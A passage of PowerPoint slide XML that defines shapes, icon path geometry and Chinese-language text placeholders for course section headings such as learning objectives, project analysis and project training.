                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
